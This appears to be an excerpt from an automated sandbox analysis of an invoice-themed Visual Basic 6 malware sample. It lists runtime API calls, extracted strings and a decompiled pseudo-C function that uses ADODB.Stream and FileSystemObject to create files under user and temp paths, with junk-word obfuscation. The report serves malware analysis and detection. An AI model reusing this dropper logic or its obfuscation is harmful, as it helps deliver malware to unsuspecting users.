__vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,00401214,00000000,?,?,ADODB.Stream,00000000), ref: 0041E558
__vbaObjSetAddref.MSVBVM60(00401210,00000000,?,?,Scripting.FileSystemObject,00000000,00401214,00000000,?,?,ADODB.Stream,00000000), ref: 0041E567
__vbaFreeVar.MSVBVM60(00401210,00000000,?,?,Scripting.FileSystemObject,00000000,00401214,00000000,?,?,ADODB.Stream,00000000), ref: 0041E56F
__vbaVarDup.MSVBVM60 ref: 0041E591
#666.MSVBVM60(?,?), ref: 0041E59E
__vbaVarCat.MSVBVM60(00000000,00000008,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E5DA
__vbaChkstk.MSVBVM60(00000000,00000008,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E5E4
__vbaChkstk.MSVBVM60(00000000,00000008,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E5F2
__vbaLateMemCallLd.MSVBVM60(00000000,004202B8,CreateTextFile,00000002,00000000,00000008,?), ref: 0041E61A
__vbaObjVar.MSVBVM60(00000000,00401210,00000000,?,?,Scripting.FileSystemObject,00000000,00401214,00000000,?,?,ADODB.Stream,00000000), ref: 0041E623
__vbaObjSetAddref.MSVBVM60(0040120C,00000000,00000000,00401210,00000000,?,?,Scripting.FileSystemObject,00000000,00401214,00000000,?,?,ADODB.Stream,00000000), ref: 0041E632
__vbaFreeVarList.MSVBVM60(00000004,?,?,00000000,00000000,0040120C,00000000,00000000,00401210,00000000,?,?,Scripting.FileSystemObject,00000000,00401214,00000000), ref: 0041E64F
__vbaStrCmp.MSVBVM60(Wayment7,?), ref: 0041E667
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000,Wayment7,?), ref: 0041E67F
__vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,Wayment7,?), ref: 0041E688
__vbaObjSetAddref.MSVBVM60(00401208,00000000,?,?,Scripting.FileSystemObject,00000000,Wayment7,?), ref: 0041E697
__vbaFreeVar.MSVBVM60(00401208,00000000,?,?,Scripting.FileSystemObject,00000000,Wayment7,?), ref: 0041E69F
__vbaVarDup.MSVBVM60 ref: 0041E6C1
#666.MSVBVM60(?,?), ref: 0041E6CE
__vbaVarCat.MSVBVM60(?,00000008,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E70A
__vbaChkstk.MSVBVM60(?,00000008,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E714
__vbaChkstk.MSVBVM60(?,00000008,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041E722
__vbaLateMemCallLd.MSVBVM60(?,00040006,CreateTextFile,00000002,?,00000008,?), ref: 0041E74A
__vbaObjVar.MSVBVM60(00000000,?,?,?,?,00401208,00000000,?,?,Scripting.FileSystemObject,00000000,Wayment7,?), ref: 0041E753
__vbaObjSetAddref.MSVBVM60(00401204,00000000,00000000,?,?,?,?,00401208,00000000,?,?,Scripting.FileSystemObject,00000000,Wayment7,?), ref: 0041E762
__vbaFreeVarList.MSVBVM60(00000004,?,?,00000000,?,00401204,00000000,00000000,?,?,?,?,00401208,00000000,?,?), ref: 0041E77F
__vbaVarDup.MSVBVM60 ref: 0041E7A4
#528.MSVBVM60(?,?), ref: 0041E7B1
__vbaHresultCheckObj.MSVBVM60(00000000,004012A8,00402958,00000260), ref: 0041F4D0
__vbaFreeStr.MSVBVM60(0041F57B), ref: 0041F53D
__vbaFreeStr.MSVBVM60(0041F57B), ref: 0041F545
__vbaFreeObj.MSVBVM60(0041F57B), ref: 0041F54D
__vbaFreeStr.MSVBVM60(0041F57B), ref: 0041F555
__vbaFreeStr.MSVBVM60(0041F57B), ref: 0041F55D
__vbaFreeStr.MSVBVM60(0041F57B), ref: 0041F565
__vbaFreeStr.MSVBVM60(0041F57B), ref: 0041F56D
__vbaFreeStr.MSVBVM60(0041F57B), ref: 0041F575

Strings

Tegngivningers5, xrefs: 0041F17E
userprofile, xrefs: 0041E0CB
\Bk119, xrefs: 0041E5A3
Equalised4, xrefs: 0041E96E
APETALOUSNESS, xrefs: 0041FA11
Uigennemsigtighedens9, xrefs: 0041EA74
CreateTextFile, xrefs: 0041E605, 0041E735
KATTEMUSIKKEN, xrefs: 0041F463
PHYSIANTHROPY, xrefs: 0041F9E5
Scripting.FileSystemObject, xrefs: 0041E546, 0041E676
ADODB.Stream, xrefs: 0041E516, 0041EAB5
TMP, xrefs: 0041E574, 0041E6A4
indskrumpning, xrefs: 0041E978
tmp, xrefs: 0041F291
CYKELENS, xrefs: 0041E828
\Y8BvlQimiLpwrF4Mk23, xrefs: 0041E6D3
tandpleje, xrefs: 0041E787
Gatfinnes, xrefs: 0041F802
windir, xrefs: 0041E25B
Wayment7, xrefs: 0041E662
Unenjoyably, xrefs: 0041F328
archemastry, xrefs: 0041E8C5
\qb30Ii7QgBt9vIUPKwgIth148, xrefs: 0041F2C0
NONFAT, xrefs: 0041EA6A
svinghjulsarm, xrefs: 0041E2C8
OVERPRIZER, xrefs: 0041EA6F
HOGMANES, xrefs: 0041E973
extoller, xrefs: 0041E28A
Chemotropism1, xrefs: 0041F716

Memory Dump Source

Source File: 00000000.00000002.860876690.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.860868648.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.860924190.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.860928984.0000000000424000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURAS.jbxd

Similarity

API ID: __vba$Free$Move$List$AddrefChkstk$CheckCopyHresult$#666#716$CallLate$#524#528#572#607#613#619#667#704#712New2
String ID: ADODB.Stream$APETALOUSNESS$CYKELENS$Chemotropism1$CreateTextFile$Equalised4$Gatfinnes$HOGMANES$KATTEMUSIKKEN$NONFAT$OVERPRIZER$PHYSIANTHROPY$Scripting.FileSystemObject$TMP$Tegngivningers5$Uigennemsigtighedens9$Unenjoyably$Wayment7$\Bk119$\Y8BvlQimiLpwrF4Mk23$\qb30Ii7QgBt9vIUPKwgIth148$archemastry$extoller$indskrumpning$svinghjulsarm$tandpleje$tmp$userprofile$windir
API String ID: 3015175179-4083922817
Opcode ID: 18c4761bfe4460e058d5e4ea0ce412503d97275578f5d625923a4c1101d81b15
Instruction ID: 46c9af60cbe40e98b84d64085873d9ad5f65c055f1a01e8da00752398014dc6e
Opcode Fuzzy Hash: 18c4761bfe4460e058d5e4ea0ce412503d97275578f5d625923a4c1101d81b15
Instruction Fuzzy Hash: AEF22A71900219ABDB20EFA1CC45FDEB7B4BF14304F1045BAE509BB1A1DB795A89CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041C944, Relevance: 263.4, APIs: 125, Strings: 25, Instructions: 884
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E0041C944(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v44;
				char _v48;
				void* _v52;
				void* _v56;
				void* _v60;
				short _v64;
				short _v68;
				void* _v72;
				char _v88;
				char _v92;
				short _v96;
				void* _v100;
				signed int _v104;
				char _v108;
				signed int _v112;
				signed int _v116;
				char _v120;
				intOrPtr _v128;
				char _v136;
				intOrPtr _v144;
				char _v152;
				char _v168;
				char _v184;
				char _v200;
				char* _v208;
				intOrPtr _v216;
				intOrPtr _v240;
				intOrPtr _v248;
				short _v252;
				short _v256;
				void* _v260;
				signed int _v264;
				char _v268;
				char _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				intOrPtr _v316;
				intOrPtr* _v320;
				signed int _v324;
				signed int _v328;
				intOrPtr* _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int* _t457;
				signed int _t469;
				signed int _t471;
				signed int _t472;
				void* _t473;
				signed int _t481;
				short _t486;
				signed int _t490;
				signed int _t495;
				signed int _t500;
				char* _t502;
				signed int _t503;
				signed int _t507;
				signed int _t515;
				signed int* _t524;
				signed int _t528;
				signed int* _t545;
				signed int _t549;
				void* _t564;
				signed int _t570;
				short _t571;
				short _t579;
				signed int _t580;
				char* _t590;
				void* _t593;
				char* _t595;
				char* _t597;
				short _t600;
				signed int _t601;
				signed int _t602;
				signed int _t603;
				signed int _t605;
				signed int _t607;
				short _t609;
				signed int _t610;
				char* _t611;
				signed int _t617;
				signed int _t622;
				char* _t625;
				signed int _t631;
				signed int _t636;
				signed int _t688;
				signed int _t696;
				void* _t745;
				void* _t747;
				intOrPtr _t748;

				_t748 = _t747 - 0x10;
				 *[fs:0x0] = _t748;
				L00401390();
				_v20 = _t748;
				_v16 = E00401208;
				_v12 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401396, _t745);
				_v128 = 0x80020004;
				_v136 = 0xa;
				_push( &_v136);
				_push( &_v152);
				L00401660();
				_push( &_v152);
				_t457 =  &_v104;
				_push(_t457);
				L00401666();
				_push(_t457);
				L0040166C();
				L00401672();
				L0040165A();
				_push( &_v152);
				_push( &_v136);
				_push(2);
				L00401654();
				_v144 = 0x80020004;
				_v152 = 0xa;
				_v128 = 0x6a1aed;
				_v136 = 3;
				_push(1);
				_push(1);
				_push( &_v152);
				_push( &_v136);
				_push( &_v168); // executed
				L0040164E(); // executed
				_push(0x2f);
				_push( &_v168);
				_push( &_v184);
				L00401648();
				_push(0);
				_push( &_v184); // executed
				L0040163C(); // executed
				L00401672();
				L00401642();
				L0040165A();
				_push( &_v184);
				_push( &_v168);
				_push( &_v152);
				_t469 =  &_v136;
				_push(_t469);
				_push(4);
				L00401654();
				if((_t469 | 0xffffffff) != 0) {
					_push(0);
					L00401636();
					L00401630();
					if( *0x4223f0 != 0) {
						_v320 = 0x4223f0;
					} else {
						_push(0x4223f0);
						_push(0x402d44);
						L0040162A();
						_v320 = 0x4223f0;
					}
					_v276 =  *_v320;
					_t631 =  *((intOrPtr*)( *_v276 + 0x14))(_v276,  &_v120);
					asm("fclex");
					_v280 = _t631;
					if(_v280 >= 0) {
						_v324 = _v324 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402d34);
						_push(_v276);
						_push(_v280);
						L00401624();
						_v324 = _t631;
					}
					_v284 = _v120;
					_t636 =  *((intOrPtr*)( *_v284 + 0x108))(_v284,  &_v252);
					asm("fclex");
					_v288 = _t636;
					if(_v288 >= 0) {
						_v328 = _v328 & 0x00000000;
					} else {
						_push(0x108);
						_push(0x402d54);
						_push(_v284);
						_push(_v288);
						L00401624();
						_v328 = _t636;
					}
					_v68 = _v252;
					L0040161E();
					_push(L"opfrisk");
					_push(L"SLIDFAST");
					_push(L"Sacrocotyloidean8");
					_push(L"Turcize6"); // executed
					L00401618(); // executed
				}
				_t471 = 0;
				if(0 != 0) {
					_v208 = L"9/9/9";
					_v216 = 8;
					L0040160C();
					_push(0);
					_t611 =  &_v136;
					_push(_t611);
					L00401612();
					L00401672();
					L00401606();
					_push(L"LAPIDATOR");
					L004015FA();
					_push(_t611);
					L00401600();
					L00401672();
					L00401642();
					L0040165A();
					if( *0x4223f0 != 0) {
						_v332 = 0x4223f0;
					} else {
						_push(0x4223f0);
						_push(0x402d44);
						L0040162A();
						_v332 = 0x4223f0;
					}
					_v276 =  *_v332;
					_t617 =  *((intOrPtr*)( *_v276 + 0x14))(_v276,  &_v120);
					asm("fclex");
					_v280 = _t617;
					if(_v280 >= 0) {
						_v336 = _v336 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x402d34);
						_push(_v276);
						_push(_v280);
						L00401624();
						_v336 = _t617;
					}
					_v284 = _v120;
					_t622 =  *((intOrPtr*)( *_v284 + 0xd0))(_v284,  &_v104);
					asm("fclex");
					_v288 = _t622;
					if(_v288 >= 0) {
						_v340 = _v340 & 0x00000000;
					} else {
						_push(0xd0);
						_push(0x402d54);
						_push(_v284);
						_push(_v288);
						L00401624();
						_v340 = _t622;
					}
					_v304 = _v104;
					_v104 = _v104 & 0x00000000;
					L00401672();
					L0040161E();
					_push(0);
					_push(L"ADODB.Stream");
					_push( &_v136);
					L004015E8();
					_t625 =  &_v136;
					_push(_t625);
					L004015EE();
					_push(_t625);
					_t471 =  &_v92;
					_push(_t471);
					L004015F4();
					L00401606();
				}
				_t472 = _t471 | 0xffffffff;
				if(_t472 != 0) {
					_push(0);
					_push(L"ADODB.Stream");
					_push( &_v136); // executed
					L004015E8(); // executed
					_t595 =  &_v136;
					_push(_t595);
					L004015EE();
					_push(_t595);
					_push( &_v48);
					L004015F4();
					L00401606();
					_v208 = L"userprofile";
					_v216 = 8;
					L0040160C();
					_t597 =  &_v136;
					_push(_t597);
					L004015DC();
					L00401672();
					_push(_t597);
					L004015E2();
					L00401672();
					L0040165A();
					L00401606();
					 *((short*)( *((intOrPtr*)(_a4 + 0x44)))) = 0x3c4e;
					_v128 = 0x80020004;
					_v136 = 0xa;
					_t600 =  &_v136;
					_push(_t600);
					L004015D6();
					 *((short*)( *((intOrPtr*)(_a4 + 0x44)) + 2)) = _t600;
					L00401606();
					_t601 = 2;
					_t602 = _t601 << 1;
					 *((short*)( *((intOrPtr*)(_a4 + 0x44)) + _t602)) = 0x5f19;
					_push(L"Besjlede");
					L004015D0();
					_t688 = 2;
					 *( *((intOrPtr*)(_a4 + 0x44)) + _t688 * 3) = _t602;
					_t603 = 2;
					 *((short*)( *((intOrPtr*)(_a4 + 0x44)) + (_t603 << 2))) = 0x92a;
					_t605 = 2;
					 *((short*)( *((intOrPtr*)(_a4 + 0x44)) + _t605 * 5)) = 0x746a;
					_t607 = 2;
					 *((short*)( *((intOrPtr*)(_a4 + 0x44)) + _t607 * 6)) = 0x3f38;
					_v128 = 0x80020004;
					_v136 = 0xa;
					_t609 =  &_v136;
					_push(_t609);
					L004015D6();
					_t696 = 2;
					 *((short*)( *((intOrPtr*)(_a4 + 0x44)) + _t696 * 7)) = _t609;
					L00401606();
					_t610 = 2;
					_t472 = _t610 << 3;
					 *((short*)( *((intOrPtr*)(_a4 + 0x44)) + _t472)) = 0x53a4;
					_push(L"Mitiest");
					L004015CA();
					L00401672();
				}
				L004015D0();
				_v264 = _t472;
				_v272 = 0x1c0182;
				_v256 = 0x4719;
				_t473 = _v264;
				_v252 = _t473;
				L004015FA();
				_v268 = _t473;
				_t481 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v268,  &_v252,  &_v256,  &_v272, L"STATUTTERNES", 0x42f7,  &_v260, L"TILFRSEL", L"trussereder");
				_v276 = _t481;
				if(_v276 >= 0) {
					_v344 = _v344 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x402988);
					_push(_a4);
					_push(_v276);
					L00401624();
					_v344 = _t481;
				}
				_v64 = _v260;
				_v208 = 0x402e64;
				_v216 = 8;
				L0040160C();
				L004015C4();
				_t486 =  &_v104;
				L00401666();
				L004015D0();
				_v252 = _t486;
				_t490 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4, 0x375217,  &_v252, _t486, _t486,  &_v152,  &_v152, 0xdb,  &_v136);
				_v276 = _t490;
				if(_v276 >= 0) {
					_v348 = _v348 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x402988);
					_push(_a4);
					_push(_v276);
					L00401624();
					_v348 = _t490;
				}
				L0040165A();
				L00401654();
				_t495 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 2,  &_v136,  &_v152);
				_v276 = _t495;
				if(_v276 >= 0) {
					_v352 = _v352 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x402988);
					_push(_a4);
					_push(_v276);
					L00401624();
					_v352 = _t495;
				}
				_v252 = 0x6c66;
				_t500 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, 0x32c4,  &_v252, L"UROSIGNALERNES", 0x325d55, 0x1de1,  &_v268);
				_v276 = _t500;
				if(_v276 >= 0) {
					_v356 = _v356 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x402988);
					_push(_a4);
					_push(_v276);
					L00401624();
					_v356 = _t500;
				}
				 *((intOrPtr*)(_a4 + 0x58)) = _v268;
				_t502 =  &_v136;
				L004015BE(); // executed
				L004015B2();
				_t503 =  &_v120;
				L004015B8();
				_v276 = _t503;
				_t507 =  *((intOrPtr*)( *_v276 + 0x1c))(_v276,  &_v268, _t503, _t502, _t502, L"promisingness", L"Venerologisk3");
				asm("fclex");
				_v280 = _t507;
				if(_v280 >= 0) {
					_v360 = _v360 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x402ecc);
					_push(_v276);
					_push(_v280);
					L00401624();
					_v360 = _t507;
				}
				_v272 = 0x599d29;
				_v252 = 0x2dc2;
				L004015AC();
				L00401672();
				_t515 =  *((intOrPtr*)( *_a4 + 0x708))(_a4,  &_v104,  &_v252,  &_v272, _v268,  &_v256,  &_v136);
				_v284 = _t515;
				if(_v284 >= 0) {
					_v364 = _v364 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x402988);
					_push(_a4);
					_push(_v284);
					L00401624();
					_v364 = _t515;
				}
				_v96 = _v256;
				L0040165A();
				L0040161E();
				L00401606();
				L004015A6();
				_v144 = 0x4150;
				_v152 = 2;
				L004015A0();
				L00401672();
				_v256 = 0x2846;
				_v308 = _v112;
				_v112 = _v112 & 0x00000000;
				L00401672();
				_v252 = 0x3593;
				_t524 =  &_v104;
				L00401666();
				_t528 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v252, _t524, _t524,  &_v136,  &_v108, L"PYLOROSTENOSIS",  &_v256,  &_v268,  &_v152,  &_v136, 0xc5, 0xa2, 0x57);
				_v276 = _t528;
				if(_v276 >= 0) {
					_v368 = _v368 & 0x00000000;
				} else {
					_push(0x70c);
					_push(0x402988);
					_push(_a4);
					_push(_v276);
					L00401624();
					_v368 = _t528;
				}
				 *((intOrPtr*)(_a4 + 0x5c)) = _v268;
				L0040159A();
				L00401654();
				_v144 = 0x2e;
				_v152 = 2;
				_v208 = L"FREMMDET";
				_v216 = 8;
				L0040160C();
				L00401594();
				L0040158E();
				L00401672();
				_v240 = 0x402f40;
				_v248 = 8;
				L0040160C();
				L004015C4();
				_v252 = 0x52d6;
				_v312 = _v116;
				_v116 = _v116 & 0x00000000;
				L004015AC();
				L00401672();
				_t545 =  &_v112;
				L00401666();
				L00401672();
				L00401588();
				_t549 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v108, _t545, _t545, _t545, _t545,  &_v200,  &_v252, 0x3e74,  &_v268,  &_v168,  &_v200, 0xcf,  &_v184, L"photosensitiser", 0xbc,  &_v168,  &_v136, 0x51,  &_v152, 2,  &_v152,  &_v136, 3,  &_v104,  &_v108,  &_v112);
				_v276 = _t549;
				if(_v276 >= 0) {
					_v372 = _v372 & 0x00000000;
				} else {
					_push(0x710);
					_push(0x402988);
					_push(_a4);
					_push(_v276);
					L00401624();
					_v372 = _t549;
				}
				 *((intOrPtr*)(_a4 + 0x60)) = _v268;
				L0040159A();
				L00401654();
				_v252 = 0x51c1;
				_v268 = 0x8025bf;
				_t564 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4, 0x4485bb,  &_v268, 0x338b,  &_v252, 5,  &_v136,  &_v152,  &_v184,  &_v168,  &_v200, 4,  &_v104,  &_v108,  &_v112,  &_v116);
				_v272 = 0x3560f9;
				_v252 = 0xbff;
				_v268 = 0x6d982b;
				L004015FA();
				_t570 =  *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v268, 0x976,  &_v252, L"heminee",  &_v272, _t564, L"chaussebrolgnings");
				_v276 = _t570;
				if(_v276 >= 0) {
					_v376 = _v376 & 0x00000000;
				} else {
					_push(0x714);
					_push(0x402988);
					_push(_a4);
					_push(_v276);
					L00401624();
					_v376 = _t570;
				}
				_v128 = 0x80020004;
				_v136 = 0xa;
				_t571 =  &_v136;
				L004015D6();
				_v256 = _t571;
				_v268 = 0x80e1a8;
				_v252 = _v256;
				 *((intOrPtr*)( *_a4 + 0x720))(_a4, L"forkul",  &_v252, 0x52b8f8,  &_v268, 0x34d31f,  &_v272, _t571);
				_t579 = _a4;
				 *((intOrPtr*)(_t579 + 0x64)) = _v272;
				L00401606();
				L00401600();
				L00401672();
				L004015D0();
				_v252 = _t579;
				L00401582();
				L00401672();
				_t580 = _v112;
				_v316 = _t580;
				_v112 = _v112 & 0x00000000;
				L00401672();
				 *((intOrPtr*)( *_a4 + 0x724))(_a4, _v252, _t580, 0x6082, _t579, 0x4ead83);
				L0040159A();
				E00420D84();
				_v208 = 2;
				_v216 = 2;
				L0040157C();
				_v208 = 0x807888;
				_v216 = 3;
				L0040157C();
				_t590 =  &_v136;
				L00401570();
				L00401576();
				_t593 =  *((intOrPtr*)( *_a4 + 0x728))(_a4, _t590, _t590, _t590,  &_v44,  &_v88, 3,  &_v104,  &_v108,  &_v112);
				_v12 = 0;
				_push(0x41d840);
				L00401606();
				L0040161E();
				L0040165A();
				L0040165A();
				L0040165A();
				L0040165A();
				L00401606();
				L0040161E();
				L0040165A();
				return _t593;
			}

0x0041c947
0x0041c956
0x0041c962
0x0041c96a
0x0041c96d
0x0041c97a
0x0041c983
0x0041c986
0x0041c995
0x0041c998
0x0041c99f
0x0041c9af
0x0041c9b6
0x0041c9b7
0x0041c9c2
0x0041c9c3
0x0041c9c6
0x0041c9c7
0x0041c9cc
0x0041c9cd
0x0041c9d7
0x0041c9df
0x0041c9ea
0x0041c9f1
0x0041c9f2
0x0041c9f4
0x0041c9fc
0x0041ca06
0x0041ca10
0x0041ca17
0x0041ca21
0x0041ca23
0x0041ca2b
0x0041ca32
0x0041ca39
0x0041ca3a
0x0041ca3f
0x0041ca47
0x0041ca4e
0x0041ca4f
0x0041ca54
0x0041ca5c
0x0041ca5d
0x0041ca67
0x0041ca74
0x0041ca7c
0x0041ca87
0x0041ca8e
0x0041ca95
0x0041ca96
0x0041ca9c
0x0041ca9d
0x0041ca9f
0x0041caac
0x0041cab2
0x0041cab4
0x0041cab9
0x0041cac5
0x0041cae2
0x0041cac7
0x0041cac7
0x0041cacc
0x0041cad1
0x0041cad6
0x0041cad6
0x0041caf4
0x0041cb0c
0x0041cb0f
0x0041cb11
0x0041cb1e
0x0041cb40
0x0041cb20
0x0041cb20
0x0041cb22
0x0041cb27
0x0041cb2d
0x0041cb33
0x0041cb38
0x0041cb38
0x0041cb4a
0x0041cb65
0x0041cb6b
0x0041cb6d
0x0041cb7a
0x0041cb9f
0x0041cb7c
0x0041cb7c
0x0041cb81
0x0041cb86
0x0041cb8c
0x0041cb92
0x0041cb97
0x0041cb97
0x0041cbad
0x0041cbb4
0x0041cbb9
0x0041cbbe
0x0041cbc3
0x0041cbc8
0x0041cbcd
0x0041cbcd
0x0041cbd2
0x0041cbd6
0x0041cbdc
0x0041cbe6
0x0041cbfc
0x0041cc01
0x0041cc03
0x0041cc09
0x0041cc0a
0x0041cc14
0x0041cc1f
0x0041cc24
0x0041cc29
0x0041cc2e
0x0041cc2f
0x0041cc39
0x0041cc46
0x0041cc4e
0x0041cc5a
0x0041cc77
0x0041cc5c
0x0041cc5c
0x0041cc61
0x0041cc66
0x0041cc6b
0x0041cc6b
0x0041cc89
0x0041cca1
0x0041cca4
0x0041cca6
0x0041ccb3
0x0041ccd5
0x0041ccb5
0x0041ccb5
0x0041ccb7
0x0041ccbc
0x0041ccc2
0x0041ccc8
0x0041cccd
0x0041cccd
0x0041ccdf
0x0041ccf7
0x0041ccfd
0x0041ccff
0x0041cd0c
0x0041cd31
0x0041cd0e
0x0041cd0e
0x0041cd13
0x0041cd18
0x0041cd1e
0x0041cd24
0x0041cd29
0x0041cd29
0x0041cd3b
0x0041cd41
0x0041cd4e
0x0041cd56
0x0041cd5b
0x0041cd5d
0x0041cd68
0x0041cd69
0x0041cd6e
0x0041cd74
0x0041cd75
0x0041cd7a
0x0041cd7b
0x0041cd7e
0x0041cd7f
0x0041cd8a
0x0041cd8a
0x0041cd8f
0x0041cd94
0x0041cd9a
0x0041cd9c
0x0041cda7
0x0041cda8
0x0041cdad
0x0041cdb3
0x0041cdb4
0x0041cdb9
0x0041cdbd
0x0041cdbe
0x0041cdc9
0x0041cdce
0x0041cdd8
0x0041cdee
0x0041cdf3
0x0041cdf9
0x0041cdfa
0x0041ce04
0x0041ce09
0x0041ce0a
0x0041ce14
0x0041ce1c
0x0041ce27
0x0041ce32
0x0041ce37
0x0041ce3e
0x0041ce48
0x0041ce4e
0x0041ce4f
0x0041ce5a
0x0041ce64
0x0041ce6b
0x0041ce6c
0x0041ce74
0x0041ce7a
0x0041ce7f
0x0041ce86
0x0041ce90
0x0041ce96
0x0041cea0
0x0041cea8
0x0041ceb2
0x0041ceba
0x0041cec4
0x0041ceca
0x0041ced1
0x0041cedb
0x0041cee1
0x0041cee2
0x0041cee9
0x0041cef3
0x0041cefd
0x0041cf04
0x0041cf05
0x0041cf0e
0x0041cf14
0x0041cf19
0x0041cf23
0x0041cf23
0x0041cf2d
0x0041cf32
0x0041cf39
0x0041cf43
0x0041cf4c
0x0041cf53
0x0041cf5f
0x0041cf64
0x0041cf9f
0x0041cfa5
0x0041cfb2
0x0041cfd4
0x0041cfb4
0x0041cfb4
0x0041cfb9
0x0041cfbe
0x0041cfc1
0x0041cfc7
0x0041cfcc
0x0041cfcc
0x0041cfe2
0x0041cfe6
0x0041cff0
0x0041d006
0x0041d01e
0x0041d02a
0x0041d02e
0x0041d034
0x0041d039
0x0041d054
0x0041d05a
0x0041d067
0x0041d089
0x0041d069
0x0041d069
0x0041d06e
0x0041d073
0x0041d076
0x0041d07c
0x0041d081
0x0041d081
0x0041d093
0x0041d0a8
0x0041d0b8
0x0041d0be
0x0041d0cb
0x0041d0ed
0x0041d0cd
0x0041d0cd
0x0041d0d2
0x0041d0d7
0x0041d0da
0x0041d0e0
0x0041d0e5
0x0041d0e5
0x0041d0f4
0x0041d127
0x0041d12d
0x0041d13a
0x0041d15c
0x0041d13c
0x0041d13c
0x0041d141
0x0041d146
0x0041d149
0x0041d14f
0x0041d154
0x0041d154
0x0041d16c
0x0041d179
0x0041d180
0x0041d185
0x0041d18b
0x0041d18f
0x0041d194
0x0041d1af
0x0041d1b2
0x0041d1b4
0x0041d1c1
0x0041d1e3
0x0041d1c3
0x0041d1c3
0x0041d1c5
0x0041d1ca
0x0041d1d0
0x0041d1d6
0x0041d1db
0x0041d1db
0x0041d1ea
0x0041d1f4
0x0041d204
0x0041d20e
0x0041d23a
0x0041d240
0x0041d24d
0x0041d26f
0x0041d24f
0x0041d24f
0x0041d254
0x0041d259
0x0041d25c
0x0041d262
0x0041d267
0x0041d267
0x0041d27d
0x0041d284
0x0041d28c
0x0041d297
0x0041d2af
0x0041d2b4
0x0041d2be
0x0041d2cf
0x0041d2d9
0x0041d2de
0x0041d2ea
0x0041d2f0
0x0041d2fd
0x0041d302
0x0041d329
0x0041d32d
0x0041d342
0x0041d348
0x0041d355
0x0041d377
0x0041d357
0x0041d357
0x0041d35c
0x0041d361
0x0041d364
0x0041d36a
0x0041d36f
0x0041d36f
0x0041d387
0x0041d398
0x0041d3b0
0x0041d3b8
0x0041d3c2
0x0041d3cc
0x0041d3d6
0x0041d3ec
0x0041d408
0x0041d417
0x0041d421
0x0041d426
0x0041d430
0x0041d446
0x0041d45e
0x0041d463
0x0041d46f
0x0041d475
0x0041d480
0x0041d48a
0x0041d4a9
0x0041d4ad
0x0041d4bc
0x0041d4c2
0x0041d4d4
0x0041d4da
0x0041d4e7
0x0041d509
0x0041d4e9
0x0041d4e9
0x0041d4ee
0x0041d4f3
0x0041d4f6
0x0041d4fc
0x0041d501
0x0041d501
0x0041d519
0x0041d52e
0x0041d55b
0x0041d563
0x0041d56c
0x0041d596
0x0041d59c
0x0041d5a6
0x0041d5af
0x0041d5be
0x0041d5eb
0x0041d5f1
0x0041d5fe
0x0041d620
0x0041d600
0x0041d600
0x0041d605
0x0041d60a
0x0041d60d
0x0041d613
0x0041d618
0x0041d618
0x0041d627
0x0041d62e
0x0041d638
0x0041d63f
0x0041d644
0x0041d64b
0x0041d65c
0x0041d68f
0x0041d695
0x0041d69e
0x0041d6a7
0x0041d6b1
0x0041d6bb
0x0041d6c1
0x0041d6c6
0x0041d6cd
0x0041d6d7
0x0041d6dc
0x0041d6df
0x0041d6e5
0x0041d6f7
0x0041d70b
0x0041d71f
0x0041d727
0x0041d72c
0x0041d736
0x0041d749
0x0041d74e
0x0041d758
0x0041d76b
0x0041d778
0x0041d77f
0x0041d785
0x0041d793
0x0041d799
0x0041d7a0
0x0041d7fa
0x0041d802
0x0041d80a
0x0041d812
0x0041d81a
0x0041d822
0x0041d82a
0x0041d832
0x0041d83a
0x0041d83f

APIs

__vbaChkstk.MSVBVM60(?,00401396), ref: 0041C962
#647.MSVBVM60(?,0000000A), ref: 0041C9B7
__vbaStrVarVal.MSVBVM60(?,?,?,0000000A), ref: 0041C9C7
#519.MSVBVM60(00000000,?,?,?,0000000A), ref: 0041C9CD
__vbaStrMove.MSVBVM60(00000000,?,?,?,0000000A), ref: 0041C9D7
__vbaFreeStr.MSVBVM60(00000000,?,?,?,0000000A), ref: 0041C9DF
__vbaFreeVarList.MSVBVM60(00000002,0000000A,?,00000000,?,?,?,0000000A), ref: 0041C9F4
#660.MSVBVM60(?,00000003,0000000A,00000001,00000001), ref: 0041CA3A
